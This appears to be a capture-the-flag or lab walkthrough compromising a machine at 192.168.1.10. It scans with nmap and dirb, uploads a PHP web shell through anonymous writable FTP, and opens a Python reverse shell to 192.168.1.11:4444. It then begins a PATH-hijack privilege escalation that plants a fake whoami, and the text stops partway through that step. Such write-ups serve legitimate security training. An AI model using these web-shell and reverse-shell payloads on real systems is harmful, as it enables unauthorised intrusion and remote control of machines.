We start scanning the host with nmap –A –T4 –p- 192.168.1.10 –vv
Then we scan it with dirb http://192.168.1.10 /usr/share/dirb/wordlists/big.txt
The robots.txt file:
We can bypass this by following this article https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/
Now we reload Firefox:
We enter the path /secret_information:
Ok the ftp port is open and it’s writable, we can login using anonymous as the username and password:
There is a folder pub it’s writable and executable, we can upload a shell there to gain an access
Uploaded different ones and then I got a connection:
Inside the shell.php put this code : <?php system($_GET[‘shell’]);?> then upload it to the ftp service.
As we can see we can have a shell and got id of the system, now we can get a shell using a python script:
The python script: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.11”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
In the home folder a user named Tom, there is a script rootshell when we run it it checks if we are Tom or not.
Now have a PATH abusing situation here, we can do it in a simple way writing the following commands:
echo “printf “tom”” > whoami
chmod 777 whoami